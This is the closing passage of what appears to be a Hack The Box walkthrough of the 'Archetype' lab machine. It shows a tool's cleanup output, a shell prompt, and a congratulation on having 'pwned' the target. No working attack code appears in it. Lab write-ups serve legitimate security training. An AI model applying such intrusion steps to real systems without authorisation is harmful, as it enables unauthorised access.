[*] Removing file ZUxKInhO.exe.....
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$

flag

Congratulations, we just successfully pwned the target machine. All we have left to do now is to terminate the target box (if not terminated automatically) before we continue with the next box!